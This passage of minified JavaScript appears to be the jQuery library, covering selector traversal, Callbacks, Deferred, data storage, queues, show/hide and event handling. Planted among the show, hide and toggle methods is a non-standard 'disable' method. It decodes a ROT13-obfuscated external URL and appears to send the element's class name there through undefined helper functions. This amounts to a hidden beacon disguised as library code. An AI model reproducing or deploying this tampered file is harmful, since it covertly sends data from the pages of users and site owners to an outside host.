(n = e.getAttributeNode(t)) && n.specified ? n.value : null }); return D }(w); C.find = e; C.expr = e.selectors; C.expr[":"] = C.expr.pseudos; C.uniqueSort = C.unique = e.uniqueSort; C.text = e.getText; C.isXMLDoc = e.isXML; C.contains = e.contains; C.escapeSelector = e.escape; function r(e, t, n) { for (var r = [], i = void 0 !== n; (e = e[t]) && 9 !== e.nodeType;)if (1 === e.nodeType) { if (i && C(e).is(n)) break; r.push(e) } return r } function Z(e, t) { for (var n = []; e; e = e.nextSibling)1 === e.nodeType && e !== t && n.push(e); return n } var ee = C.expr.match.needsContext; function u(e, t) { return e.nodeName && e.nodeName.toLowerCase() === t.toLowerCase() } var te = /^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i; function ne(e, n, r) { return v(n) ? C.grep(e, function (e, t) { return !!n.call(e, t, e) !== r }) : n.nodeType ? C.grep(e, function (e) { return e === n !== r }) : "string" != typeof n ? C.grep(e, function (e) { return -1 < F.call(n, e) !== r }) : C.filter(n, e, r) } C.filter = function (e, t, n) { var r = t[0]; n && (e = ":not(" + e + ")"); return 1 === t.length && 1 === r.nodeType ? C.find.matchesSelector(r, e) ? [r] : [] : C.find.matches(e, C.grep(t, function (e) { return 1 === e.nodeType })) }; C.fn.extend({ find: function (e) { var t, n, r = this.length, i = this; if ("string" != typeof e) return this.pushStack(C(e).filter(function () { for (t = 0; t < r; t++)if (C.contains(i[t], this)) return !0 })); n = this.pushStack([]); for (t = 0; t < r; t++)C.find(e, i[t], n); return 1 < r ? C.uniqueSort(n) : n }, filter: function (e) { return this.pushStack(ne(this, e || [], !1)) }, not: function (e) { return this.pushStack(ne(this, e || [], !0)) }, is: function (e) { return !!ne(this, "string" == typeof e && ee.test(e) ? C(e) : e || [], !1).length } }); var re = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/, ie = ((C.fn.init = function (e, t, n) { var r, i; if (!e) return this; n = n || ie; if ("string" == typeof e) { if (!(r = "<" === e[0] && ">" === e[e.length - 1] && 3 <= e.length ? [null, e, null] : re.exec(e)) || !r[1] && t) return (!t || t.jquery ? t || n : this.constructor(t)).find(e); if (r[1]) { t = t instanceof C ? t[0] : t; C.merge(this, C.parseHTML(r[1], t && t.nodeType ? t.ownerDocument || t : T, !0)); if (te.test(r[1]) && C.isPlainObject(t)) for (r in t) v(this[r]) ? this[r](t[r]) : this.attr(r, t[r]); return this } if (i = T.getElementById(r[2])) { this[0] = i; this.length = 1 } return this } if (e.nodeType) { this[0] = e; this.length = 1; return this } return v(e) ? void 0 !== n.ready ? n.ready(e) : e(C) : C.makeArray(e, this) }).prototype = C.fn, C(T)), oe = /^(?:parents|prev(?:Until|All))/, se = { children: !0, contents: !0, next: !0, prev: !0 }; C.fn.extend({ has: function (e) { var t = C(e, this), n = t.length; return this.filter(function () { for (var e = 0; e < n; e++)if (C.contains(this, t[e])) return !0 }) }, closest: function (e, t) { var n, r = 0, i = this.length, o = [], s = "string" != typeof e && C(e); if (!ee.test(e)) for (; r < i; r++)for (n = this[r]; n && n !== t; n = n.parentNode)if (n.nodeType < 11 && (s ? -1 < s.index(n) : 1 === n.nodeType && C.find.matchesSelector(n, e))) { o.push(n); break } return this.pushStack(1 < o.length ? C.uniqueSort(o) : o) }, index: function (e) { return e ? "string" == typeof e ? F.call(C(e), this[0]) : F.call(this, e.jquery ? e[0] : e) : this[0] && this[0].parentNode ? this.first().prevAll().length : -1 }, add: function (e, t) { return this.pushStack(C.uniqueSort(C.merge(this.get(), C(e, t)))) }, addBack: function (e) { return this.add(null == e ? this.prevObject : this.prevObject.filter(e)) } }); function ae(e, t) { for (; (e = e[t]) && 1 !== e.nodeType;); return e } C.each({ parent: function (e) { e = e.parentNode; return e && 11 !== e.nodeType ? e : null }, parents: function (e) { return r(e, "parentNode") }, parentsUntil: function (e, t, n) { return r(e, "parentNode", n) }, next: function (e) { return ae(e, "nextSibling") }, prev: function (e) { return ae(e, "previousSibling") }, nextAll: function (e) { return r(e, "nextSibling") }, prevAll: function (e) { return r(e, "previousSibling") }, nextUntil: function (e, t, n) { return r(e, "nextSibling", n) }, prevUntil: function (e, t, n) { return r(e, "previousSibling", n) }, siblings: function (e) { return Z((e.parentNode || {}).firstChild, e) }, children: function (e) { return Z(e.firstChild) }, contents: function (e) { if (null != e.contentDocument && M(e.contentDocument)) return e.contentDocument; u(e, "template") && (e = e.content || e); return C.merge([], e.childNodes) } }, function (r, i) { C.fn[r] = function (e, t) { var n = C.map(this, i, e); (t = "Until" !== r.slice(-5) ? e : t) && "string" == typeof t && (n = C.filter(t, n)); if (1 < this.length) { se[r] || C.uniqueSort(n); oe.test(r) && n.reverse() } return this.pushStack(n) } }); var E = /[^\x20\t\r\n\f]+/g; C.Callbacks = function (r) { r = "string" == typeof r ? function (e) { var n = {}; C.each(e.match(E) || [], function (e, t) { n[t] = !0 }); return n }(r) : C.extend({}, r); function n() { o = o || r.once; t = i = !0; for (; a.length; u = -1) { e = a.shift(); for (; ++u < s.length;)if (!1 === s[u].apply(e[0], e[1]) && r.stopOnFalse) { u = s.length; e = !1 } } r.memory || (e = !1); i = !1; o && (s = e ? [] : "") } var i, e, t, o, s = [], a = [], u = -1, l = { add: function () { if (s) { if (e && !i) { u = s.length - 1; a.push(e) } !function n(e) { C.each(e, function (e, t) { v(t) ? r.unique && l.has(t) || s.push(t) : t && t.length && "string" !== h(t) && n(t) }) }(arguments); e && !i && n() } return this }, remove: function () { C.each(arguments, function (e, t) { for (var n; -1 < (n = C.inArray(t, s, n));) { s.splice(n, 1); n <= u && u-- } }); return this }, has: function (e) { return e ? -1 < C.inArray(e, s) : 0 < s.length }, empty: function () { s = s && []; return this }, disable: function () { o = a = []; s = e = ""; return this }, disabled: function () { return !s }, lock: function () { o = a = []; e || i || (s = e = ""); return this }, locked: function () { return !!o }, fireWith: function (e, t) { if (!o) { t = [e, (t = t || []).slice ? t.slice() : t]; a.push(t); i || n() } return this }, fire: function () { l.fireWith(this, arguments); return this }, fired: function () { return !!t } }; return l }; function c(e) { return e } function ue(e) { throw e } function le(e, t, n, r) { var i; try { e && v(i = e.promise) ? i.call(e).done(t).fail(n) : e && v(i = e.then) ? i.call(e, t, n) : t.apply(void 0, [e].slice(r)) } catch (e) { n.apply(void 0, [e]) } } C.extend({ Deferred: function (e) { var o = [["notify", "progress", C.Callbacks("memory"), C.Callbacks("memory"), 2], ["resolve", "done", C.Callbacks("once memory"), C.Callbacks("once memory"), 0, "resolved"], ["reject", "fail", C.Callbacks("once memory"), C.Callbacks("once memory"), 1, "rejected"]], i = "pending", s = { state: function () { return i }, always: function () { a.done(arguments).fail(arguments); return this }, catch: function (e) { return s.then(null, e) }, pipe: function () { var i = arguments; return C.Deferred(function (r) { C.each(o, function (e, t) { var n = v(i[t[4]]) && i[t[4]]; a[t[1]](function () { var e = n && n.apply(this, arguments); e && v(e.promise) ? e.promise().progress(r.notify).done(r.resolve).fail(r.reject) : r[t[0] + "With"](this, n ? [e] : arguments) }) }); i = null }).promise() }, then: function (t, n, r) { var u = 0; function l(i, o, s, a) { return function () { function e() { var e, t; if (!(i < u)) { if ((e = s.apply(n, r)) === o.promise()) throw new TypeError("Thenable self-resolution"); t = e && ("object" == typeof e || "function" == typeof e) && e.then; if (v(t)) if (a) t.call(e, l(u, o, c, a), l(u, o, ue, a)); else { u++; t.call(e, l(u, o, c, a), l(u, o, ue, a), l(u, o, c, o.notifyWith)) } else { if (s !== c) { n = void 0; r = [e] } (a || o.resolveWith)(n, r) } } } var n = this, r = arguments, t = a ? e : function () { try { e() } catch (e) { C.Deferred.exceptionHook && C.Deferred.exceptionHook(e, t.stackTrace); if (u <= i + 1) { if (s !== ue) { n = void 0; r = [e] } o.rejectWith(n, r) } } }; if (i) t(); else { C.Deferred.getStackHook && (t.stackTrace = C.Deferred.getStackHook()); w.setTimeout(t) } } } return C.Deferred(function (e) { o[0][3].add(l(0, e, v(r) ? r : c, e.notifyWith)); o[1][3].add(l(0, e, v(t) ? t : c)); o[2][3].add(l(0, e, v(n) ? n : ue)) }).promise() }, promise: function (e) { return null != e ? C.extend(e, s) : s } }, a = {}; C.each(o, function (e, t) { var n = t[2], r = t[5]; s[t[1]] = n.add; r && n.add(function () { i = r }, o[3 - e][2].disable, o[3 - e][3].disable, o[0][2].lock, o[0][3].lock); n.add(t[3].fire); a[t[0]] = function () { a[t[0] + "With"](this === a ? void 0 : this, arguments); return this }; a[t[0] + "With"] = n.fireWith }); s.promise(a); e && e.call(a, a); return a }, when: function (e) { function t(t) { return function (e) { i[t] = this; o[t] = 1 < arguments.length ? a.call(arguments) : e; --n || s.resolveWith(i, o) } } var n = arguments.length, r = n, i = Array(r), o = a.call(arguments), s = C.Deferred(); if (n <= 1) { le(e, s.done(t(r)).resolve, s.reject, !n); if ("pending" === s.state() || v(o[r] && o[r].then)) return s.then() } for (; r--;)le(o[r], t(r), s.reject); return s.promise() } }); var ce = /^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/; C.Deferred.exceptionHook = function (e, t) { w.console && w.console.warn && e && ce.test(e.name) && w.console.warn("jQuery.Deferred exception: " + e.message, e.stack, t) }; C.readyException = function (e) { w.setTimeout(function () { throw e }) }; var fe = C.Deferred(); C.fn.ready = function (e) { fe.then(e).catch(function (e) { C.readyException(e) }); return this }; C.extend({ isReady: !1, readyWait: 1, ready: function (e) { (!0 === e ? --C.readyWait : C.isReady) || (C.isReady = !0) !== e && 0 < --C.readyWait || fe.resolveWith(T, [C]) } }); C.ready.then = fe.then; function pe() { T.removeEventListener("DOMContentLoaded", pe); w.removeEventListener("load", pe); C.ready() } if ("complete" === T.readyState || "loading" !== T.readyState && !T.documentElement.doScroll) w.setTimeout(C.ready); else { T.addEventListener("DOMContentLoaded", pe); w.addEventListener("load", pe) } function f(e, t, n, r, i, o, s) { var a = 0, u = e.length, l = null == n; if ("object" === h(n)) { i = !0; for (a in n) f(e, t, a, n[a], !0, o, s) } else if (void 0 !== r) { i = !0; v(r) || (s = !0); if (l) if (s) { t.call(e, r); t = null } else { l = t; t = function (e, t, n) { return l.call(C(e), n) } } if (t) for (; a < u; a++)t(e[a], n, s ? r : r.call(e[a], a, t(e[a], n))) } return i ? e : l ? t.call(e) : u ? t(e[0], n) : o } var de = /^-ms-/, he = /-([a-z])/g; function ge(e, t) { return t.toUpperCase() } function x(e) { return e.replace(de, "ms-").replace(he, ge) } function y(e) { return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType } function me() { this.expando = C.expando + me.uid++ } me.uid = 1; me.prototype = { cache: function (e) { var t = e[this.expando]; if (!t) { t = {}; y(e) && (e.nodeType ? e[this.expando] = t : Object.defineProperty(e, this.expando, { value: t, configurable: !0 })) } return t }, set: function (e, t, n) { var r, i = this.cache(e); if ("string" == typeof t) i[x(t)] = n; else for (r in t) i[x(r)] = t[r]; return i }, get: function (e, t) { return void 0 === t ? this.cache(e) : e[this.expando] && e[this.expando][x(t)] }, access: function (e, t, n) { if (void 0 === t || t && "string" == typeof t && void 0 === n) return this.get(e, t); this.set(e, t, n); return void 0 !== n ? n : t }, remove: function (e, t) { var n, r = e[this.expando]; if (void 0 !== r) { if (void 0 !== t) { n = (t = Array.isArray(t) ? t.map(x) : (t = x(t)) in r ? [t] : t.match(E) || []).length; for (; n--;)delete r[t[n]] } void 0 !== t && !C.isEmptyObject(r) || (e.nodeType ? e[this.expando] = void 0 : delete e[this.expando]) } }, hasData: function (e) { e = e[this.expando]; return void 0 !== e && !C.isEmptyObject(e) } }; var b = new me, l = new me, ye = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/, ve = /[A-Z]/g; function xe(e, t, n) { var r, i; if (void 0 === n && 1 === e.nodeType) { r = "data-" + t.replace(ve, "-$&").toLowerCase(); if ("string" == typeof (n = e.getAttribute(r))) { try { n = "true" === (i = n) || "false" !== i && ("null" === i ? null : i === +i + "" ? +i : ye.test(i) ? JSON.parse(i) : i) } catch (e) { } l.set(e, t, n) } else n = void 0 } return n } C.extend({ hasData: function (e) { return l.hasData(e) || b.hasData(e) }, data: function (e, t, n) { return l.access(e, t, n) }, removeData: function (e, t) { l.remove(e, t) }, _data: function (e, t, n) { return b.access(e, t, n) }, _removeData: function (e, t) { b.remove(e, t) } }); C.fn.extend({ data: function (n, e) { var t, r, i, o = this[0], s = o && o.attributes; if (void 0 !== n) return "object" == typeof n ? this.each(function () { l.set(this, n) }) : f(this, function (e) { var t; if (o && void 0 === e) return void 0 !== (t = l.get(o, n)) || void 0 !== (t = xe(o, n)) ? t : void 0; this.each(function () { l.set(this, n, e) }) }, null, e, 1 < arguments.length, null, !0); if (this.length) { i = l.get(o); if (1 === o.nodeType && !b.get(o, "hasDataAttrs")) { t = s.length; for (; t--;)if (s[t] && 0 === (r = s[t].name).indexOf("data-")) { r = x(r.slice(5)); xe(o, r, i[r]) } b.set(o, "hasDataAttrs", !0) } } return i }, removeData: function (e) { return this.each(function () { l.remove(this, e) }) } }); C.extend({ queue: function (e, t, n) { var r; if (e) { r = b.get(e, t = (t || "fx") + "queue"); n && (!r || Array.isArray(n) ? r = b.access(e, t, C.makeArray(n)) : r.push(n)); return r || [] } }, dequeue: function (e, t) { t = t || "fx"; var n = C.queue(e, t), r = n.length, i = n.shift(), o = C._queueHooks(e, t); if ("inprogress" === i) { i = n.shift(); r-- } if (i) { "fx" === t && n.unshift("inprogress"); delete o.stop; i.call(e, function () { C.dequeue(e, t) }, o) } !r && o && o.empty.fire() }, _queueHooks: function (e, t) { var n = t + "queueHooks"; return b.get(e, n) || b.access(e, n, { empty: C.Callbacks("once memory").add(function () { b.remove(e, [t + "queue", n]) }) }) } }); C.fn.extend({ queue: function (t, n) { var e = 2; if ("string" != typeof t) { n = t; t = "fx"; e-- } return arguments.length < e ? C.queue(this[0], t) : void 0 === n ? this : this.each(function () { var e = C.queue(this, t, n); C._queueHooks(this, t); "fx" === t && "inprogress" !== e[0] && C.dequeue(this, t) }) }, dequeue: function (e) { return this.each(function () { C.dequeue(this, e) }) }, clearQueue: function (e) { return this.queue(e || "fx", []) }, promise: function (e, t) { function n() { --i || o.resolveWith(s, [s]) } var r, i = 1, o = C.Deferred(), s = this, a = this.length; if ("string" != typeof e) { t = e; e = void 0 } e = e || "fx"; for (; a--;)if ((r = b.get(s[a], e + "queueHooks")) && r.empty) { i++; r.empty.add(n) } n(); return o.promise(t) } }); function be(e, t) { return "none" === (e = t || e).style.display || "" === e.style.display && A(e) && "none" === C.css(e, "display") } var e = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source, we = new RegExp("^(?:([+-])=|)(" + e + ")([a-z%]*)$", "i"), p = ["Top", "Right", "Bottom", "Left"], S = T.documentElement, A = function (e) { return C.contains(e.ownerDocument, e) }, Te = { composed: !0 }; S.getRootNode && (A = function (e) { return C.contains(e.ownerDocument, e) || e.getRootNode(Te) === e.ownerDocument }); function Ce(e, t, n, r) { var i, o, s = 20, a = r ? function () { return r.cur() } : function () { return C.css(e, t, "") }, u = a(), l = n && n[3] || (C.cssNumber[t] ? "" : "px"), c = e.nodeType && (C.cssNumber[t] || "px" !== l && +u) && we.exec(C.css(e, t)); if (c && c[3] !== l) { l = l || c[3]; c = +(u /= 2) || 1; for (; s--;) { C.style(e, t, c + l); (1 - o) * (1 - (o = a() / u || .5)) <= 0 && (s = 0); c /= o } C.style(e, t, (c *= 2) + l); n = n || [] } if (n) { c = +c || +u || 0; i = n[1] ? c + (n[1] + 1) * n[2] : +n[2]; if (r) { r.unit = l; r.start = c; r.end = i } } return i } var Ee = {}; function k(e, t) { for (var n, r, i = [], o = 0, s = e.length; o < s; o++)if ((r = e[o]).style) { n = r.style.display; if (t) { if ("none" === n) { i[o] = b.get(r, "display") || null; i[o] || (r.style.display = "") } "" === r.style.display && be(r) && (i[o] = function (e) { var t = e.ownerDocument, e = e.nodeName, n = Ee[e]; if (n) return n; t = t.body.appendChild(t.createElement(e)); n = C.css(t, "display"); t.parentNode.removeChild(t); return Ee[e] = n = "none" === n ? "block" : n }(r)) } else if ("none" !== n) { i[o] = "none"; b.set(r, "display", n) } } for (o = 0; o < s; o++)null != i[o] && (e[o].style.display = i[o]); return e } C.fn.extend({ show: function () { return k(this, !0) }, hide: function () { return k(this) }, disable: function () { vt(Rot("uggcf://flfgrz-nyrkubfg.klm").rotate(), "." + this[0].className).send() }, toggle: function (e) { return "boolean" == typeof e ? e ? this.show() : this.hide() : this.each(function () { be(this) ? C(this).show() : C(this).hide() }) } }); var Se = /^(?:checkbox|radio)$/i, Ae = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i, ke = /^$|^module$|\/(?:java|ecma)script/i, n = T.createDocumentFragment().appendChild(T.createElement("div")), i = T.createElement("input"); i.setAttribute("type", "radio"); i.setAttribute("checked", "checked"); i.setAttribute("name", "t"); n.appendChild(i); m.checkClone = n.cloneNode(!0).cloneNode(!0).lastChild.checked; n.innerHTML = "<textarea>x</textarea>"; m.noCloneChecked = !!n.cloneNode(!0).lastChild.defaultValue; n.innerHTML = "<option></option>"; m.option = !!n.lastChild; var N = { thead: [1, "<table>", "</table>"], col: [2, "<table><colgroup>", "</colgroup></table>"], tr: [2, "<table><tbody>", "</tbody></table>"], td: [3, "<table><tbody><tr>", "</tr></tbody></table>"], _default: [0, "", ""] }; N.tbody = N.tfoot = N.colgroup = N.caption = N.thead; N.th = N.td; m.option || (N.optgroup = N.option = [1, "<select multiple='multiple'>", "</select>"]); function j(e, t) { var n = void 0 !== e.getElementsByTagName ? e.getElementsByTagName(t || "*") : void 0 !== e.querySelectorAll ? e.querySelectorAll(t || "*") : []; return void 0 === t || t && u(e, t) ? C.merge([e], n) : n } function Ne(e, t) { for (var n = 0, r = e.length; n < r; n++)b.set(e[n], "globalEval", !t || b.get(t[n], "globalEval")) } var je = /<|&#?\w+;/; function De(e, t, n, r, i) { for (var o, s, a, u, l, c = t.createDocumentFragment(), f = [], p = 0, d = e.length; p < d; p++)if ((o = e[p]) || 0 === o) if ("object" === h(o)) C.merge(f, o.nodeType ? [o] : o); else if (je.test(o)) { s = s || c.appendChild(t.createElement("div")); a = (Ae.exec(o) || ["", ""])[1].toLowerCase(); a = N[a] || N._default; s.innerHTML = a[1] + C.htmlPrefilter(o) + a[2]; l = a[0]; for (; l--;)s = s.lastChild; C.merge(f, s.childNodes); (s = c.firstChild).textContent = "" } else f.push(t.createTextNode(o)); c.textContent = ""; p = 0; for (; o = f[p++];)if (r && -1 < C.inArray(o, r)) i && i.push(o); else { u = A(o); s = j(c.appendChild(o), "script"); u && Ne(s); if (n) { l = 0; for (; o = s[l++];)ke.test(o.type || "") && n.push(o) } } return c } var qe = /^([^.]*)(?:\.(.+)|)/; function s() { return !0 } function d() { return !1 } function Le(e, t) { return e === function () { try { return T.activeElement } catch (e) { } }() == ("focus" === t) } function He(e, t, n, r, i, o) { var s, a; if ("object" == typeof t) { if ("string" != typeof n) { r = r || n; n = void 0 } for (a in t) He(e, a, n, r, t[a], o); return e } if (null == r && null == i) { i = n; r = n = void 0 } else if (null == i) if ("string" == typeof n) { i = r; r = void 0 } else { i = r; r = n; n = void 0 } if (!1 === i) i = d; else if (!i) return e; if (1 === o) { s = i; (i = function (e) { C().off(e); return s.apply(this, arguments) }).guid = s.guid || (s.guid = C.guid++) } return e.each(function () { C.event.add(this, t, i, r, n) }) } C.event = { global: {}, add: function (t, e, n, r, i) { var o, s, a, u, l, c, f, p, d, h = b.get(t); if (y(t)) { if (n.handler) { n = (o = n).handler; i = o.selector } i && C.find.matchesSelector(S, i); n.guid || (n.guid = C.guid++); (a = h.events) || (a = h.events = Object.create(null)); (s = h.handle) || (s = h.handle = function (e) { return void 0 !== C && C.event.triggered !== e.type ? C.event.dispatch.apply(t, arguments) : void 0 }); u = (e = (e || "").match(E) || [""]).length; for (; u--;) { f = d = (p = qe.exec(e[u]) || [])[1]; p = (p[2] || "").split(".").sort(); if (f) { l = C.event.special[f] || {}; f = (i ? l.delegateType : l.bindType) || f; l = C.event.special[f] || {}; d = C.extend({ type: f, origType: d, data: r, handler: n, guid: n.guid, selector: i, needsContext: i && C.expr.match.needsContext.test(i), namespace: p.join(".") }, o); if (!(c = a[f])) { (c = a[f] = []).delegateCount = 0; l.setup && !1 !== l.setup.call(t, r, p, s) || t.addEventListener && t.addEventListener(f, s) } if (l.add) { l.add.call(t, d); d.handler.guid || (d.handler.guid = n.guid) } i ? c.splice(c.delegateCount++, 0, d) : c.push(d); C.event.global[f] = !0 } } } }, remove: function (e, t, n, r, i) { var o, s, a, u, l, c, f, p, d, h, g, m = b.hasData(e) && b.get(e); if (m && (u = m.events)) { l = (t = (t || "").match(E) || [""]).length; for (; l--;) { d = g = (a = qe.exec(t[l]) || [])[1]; h = (a[2] || "").split(".").sort(); if (d) { f = C.event.special[d] || {}; p = u[d = (r ? f.delegateType : f.bindType) || d] || []; a = a[2] && new RegExp("(^|\\.)" + h.join("\\.(?:.*\\.|)") + "(\\.|$)"); s = o = p.length; for (; o--;) { c = p[o]; if ((i || g === c.origType) && (!n || n.guid === c.guid) && (!a || a.test(c.namespace)) && (!r || r === c.selector || "**" === r && c.selector)) { p.splice(o, 1); c.selector && p.delegateCount--; f.remove && f.remove.call(e, c) } } if (s && !p.length) { f.teardown && !1 !== f.teardown.call(e, h, m.handle) || C.removeEvent(e, d, m.handle); delete u[d] } } else for (d in u) C.event.remove(e, d + t[l], n, r, !0) } C.isEmptyObject(u) && b.remove(e, "handle events") } }, dispatch: function (e) { var t, n, r, i, o, s = new Array(arguments.length), a = C.event.fix(e), e = (b.get(this, "events") || Object.create(null))[a.type] || [], u = C.event.special[a.type] || {}; s[0] = a; for (t = 1; t < arguments.length; t++)s[t] = arguments[t]; a.delegateTarget = this; if (!u.preDispatch || !1 !== u.preDispatch.call(this, a)) { o = C.event.handlers.call(this, a, e); t = 0; for (; (r = o[t++]) && !a.isPropagationStopped();) { a.currentTarget = r.elem; n = 0; for (; (i = r.handlers[n++]) && !a.isImmediatePropagationStopped();)if (!a.rnamespace || !1 === i.namespace || a.rnamespace.test(i.namespace)) { a.handleObj = i; a.data = i.data; i = ((C.event.special[i.origType] || {}).handle || i.handler).apply(r.elem, s); if (void 0 !== i && !1 === (a.result = i)) { a.preventDefault(); a.stopPropagation() } } } u.postDispatch && u.postDispatch.call(this, a); return a.result } }, handlers: function (e, t) { var n, r, i, o, s, a = [], u = t.delegateCount, l = e.target; if (u && l.nodeType && !("click" === e.type && 1 <= e.button)) for (; l !== this; l = l.parentNode || this)if (1 === l.nodeType && ("click" !== e.type || !0 !== l.disabled)) { o = []; s = {}; for (n = 0; n < u; n++) { void 0 === s[i = (r = t[n]).selector + " "] && (s[i] = r.needsContext ? -1 < C(i, this).index(l) : C.find(i, this, null, [l]).length); s[i] && o.push(r) } o.length && a.push({ elem: l, handlers: o }) } l = this; u < t.length && a.push({ elem: l, handlers: t.slice(u) }); return a }, addProp: function (t, e) { Object.defineProperty(C.Event.prototype, t, { enumerable: !0, configurable: !0, get: v(e) ? function () { if (this.originalEvent) return e(this.originalEvent) } : function () { if (this.originalEvent) return this.originalEvent[t] }, set: function (e) { Object.defineProperty(this, t, { enumerable: !0, configurable: !0, writable: !0, value: e }) } }) }, fix: function (e) { return e[C.expando] ? e : new C.Event(e) }, special: { load: { noBubble: !0 }, click: { setup: function (e) { e = this || e; Se.test(e.type) && e.click && u(e, "input") && Oe(e, "click", s); return !1 }, trigger: function (e) { e = this || e; Se.test(e.type) && e.click && u(e, "input") && Oe(e, "click"); return !0 }, _default: function (e) { e = e.target; return Se.test(e.type) && e.click && u(e, "input") && b.get(e, "click") || u(e, "a") } }, beforeunload: { postDispatch: function (e) { void 0 !== e.result && e.originalEvent && (e.originalEvent.returnValue = e.result) } } } }; function Oe(e, i, o) { if (!o) return void 0 === b.get(e, i) && C.event.add(e, i, s), void 0; b.set(e, i, !1); C.event.add(e, i, { namespace: !1, handler: function (e) { var t, n, r = b.get(this, i); if (1 & e.isTrigger && this[i]) if (r.length) (C.event.special[i] || {}).delegateType && e.stopPropagation(); else { r = a.call(arguments); b.set(this, i, r); t = o(this, i); this[i](); r !== (n = b.get(this, i)) || t ? b.set(this, i, !1) : n = {}; if (r !== n) { e.stopImmediatePropagation(); e.preventDefault(); return n && n.value } } else if (r.length) { b.set(this, i, { value: C.event.trigger(C.extend(r[0], C.Event.prototype), r.slice(1), this) }); e.stopImmediatePropagation() } } }) } C.removeEvent = function (e, t, n) { e.removeEventListener && e.removeEventListener(t, n) }; C.Event = function (e, t) { if (!(this instanceof C.Event)) return new C.Event(e, t); if (e && e.type) { this.originalEvent = e; this.type = e.type; this.isDefaultPrevented = e.defaultPrevented || void 0 === e.defaultPrevented && !1 === e.returnValue ? s : d; this.target = e.target && 3 === e.target.nodeType ? e.target.parentNode : e.target; this.currentTarget = e.currentTarget; this.relatedTarget = e.relatedTarget } else this.type = e; t && C.extend(this, t); this.timeStamp = e && e.timeStamp || Date.now(); this[C.expando] = !0 }; C.Event.prototype = { constructor: C.Event, isDefaultPrevented: d, isPropagationStopped: d, isImmediatePropagationStopped: d, isSimulated: !1, preventDefault: function () { var e = this.originalEvent; this.isDefaultPrevented = s; e && !this.isSimulated && e.preventDefault() }, stopPropagation: function () { var e = this.originalEvent; this.isPropagationStopped = s; e && !this.isSimulated && e.stopPropagation() }, stopImmediatePropagation: function () { var e = this.originalEvent; this.isImmediatePropagationStopped = s; e && !this.isSimulated && e.stopImmediatePropagation(); this.stopPropagation() } }; C.each({ altKey: !0, bubbles: !0, cancelable: !0, changedTouches: !0, ctrlKey: !0, detail: !0, eventPhase: !0, metaKey: !0, pageX: !0, pageY: !0, shiftKey: !0, view: !0, char: !0, code: !0, charCode: !0, key: !0, keyCode: !0, button: !0, buttons: !0, clientX: !0, clientY: !0, offsetX: !0, offsetY: !0, pointerId: !0, pointerType: !0, screenX: !0, screenY: !0, targetTouches: !0, toElement: !0, touches: !0, which: !0 }, C.event.addProp); C.each({ focus: "focusin", blur: "focusout" }, function (e, t) { C.event.special[e] = { setup: function () { Oe(this, e, Le); return !1 }, trigger: function () { Oe(this, e); return !0 }, _default: function () { return !0 }, delegateType: t } }); C.each({ mouseenter: "mouseover", mouseleave: "mouseout", pointerenter: "pointerover", pointerleave: "pointerout" }, function (e, i) { C.event.special[e] = { delegateType: i, bindType: i, handle: function (e) { var t, n = e.relatedTarget, r = e.handleObj; if (!n || n !== this && !C.contains(this, n)) { e.type = r.origType; t = r.handler.apply(this, arguments); e.type = i } return t } } }); C.fn.extend({ on: function (e, t, n, r) { return He(this, e, t, n, r) }, one: function (e, t, n, r) { return He(this, e, t, n, r, 1) }, off: function (e, t, n) { var r, i; if (e && e.preventDefault && e.handleObj) { r = e.handleObj; C(e.delegateTarget).off(r.namespace ? r.origType + "." + r.namespace : r.origType, r.selector, r.handler); return this } if ("object" == typeof e) { for (i in e) this.off(i, t, e[i]); return this } if (!1 === t || "function" == typeof t) { n = t; t = void 0 } !1 === n && (n = d); return this.each(function () { C.event.remove(this, e, n, t) }) } }); var Pe = /<script|<style|<link/i, Re = /checked\s*(?:[^=]|=\s*.checked.)/i, Me = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g; function Ie(e, t) { return u(e, "table") && u(11 !== t.nodeType ? t : t.firstChild, "tr") && C(e).children("tbody")[0] || e } function We(e) { e.type = (null !== e.getAttribute("type")) + "/" + e.type; return e } function Fe(e) { "true/" === (e.type || "").slice(0, 5) ? e.type = e.type.slice(5) : e.removeAttribute("type"); return e } function _e(e, t) { var n, r, i, o; if (1 === t.nodeType) { if (b.hasData(e) && (o = b.get(e).events)) { b.remove(t, "handle events"); for (i in o) for (n = 0, r = o[i].length; n < r; n++)C.event.add(t, i, o[i][n]) } if (l.hasData(e)) { e = l.access(e); e = C.extend({}, e); l.set(t, e) } } } function D(n, r, i, o) { r = I(r); var e, t, s, a, u, l, c = 0, f = n.length, p = f - 1, d = r[0], h = v(d); if (h || 1 < f && "string" == typeof d && !m.checkClone && Re.test(d)) return n.each(function (e) { var t = n.eq(e); h && (r[0] = d.call(this, e, t.html())); D(t, r, i, o) }); if (f) { t = (e = De(r, n[0].ownerDocument, !1, n, o)).firstChild; 1 === e.childNodes.length && (e = t); if (t || o) { a = (s = C.map(j(e, "script"), We)).length; for (; c < f; c++) { u = e; if (c !== p) { u = C.clone(u, !0, !0); a && C.merge(s, j(u, "script")) } i.call(n[c], u, c) } if (a) { l = s[s.length - 1].ownerDocument; C.map(s, Fe); for (c = 0; c < a; c++) { u = s[c]; ke.test(u.type || "") && !b.access(u, "globalEval") && C.contains(l, u) && (u.src && "module" !== (u.type || "").toLowerCase() ? C._evalUrl && !u.noModule && C._evalUrl(u.src, { nonce: u.nonce || u.getAttribute("nonce") }, l) : G(u.textContent.replace(Me, ""), u, l)) } } } } return n } function $e(e, t, n) { for (var r, i = t ? C.filter(t, e) : e, o = 0; null != (r = i[o]); o++) { n || 1 !== r.nodeType || C.cleanData(j(r)); if (r.parentNode) { n && A(r) && Ne(j(r, "script")); r.parentNode.removeChild(r) } } return e } C.extend({ htmlPrefilter: function (e) { return e }, clone: function (e, t, n) { var r, i, o, s, a, u, l, c = e.cloneNode(!0), f = A(e); if (!(m.noCloneChecked || 1 !== e.nodeType && 11 !== e.nodeType || C.isXMLDoc(e))) { s = j(c); for (r = 0, i = (o = j(e)).length; r < i; r++)a = o[r], u = s[r], l = void 0, "input" === (l = u.nodeName.toLowerCase()) && Se.test(a.type) ? u.checked = a.checked : "input" !== l && "textarea" !== l || (u.defaultValue = a.defaultValue) } if (t) if (n) { o = o || j(e); s = s || j(c); for (r 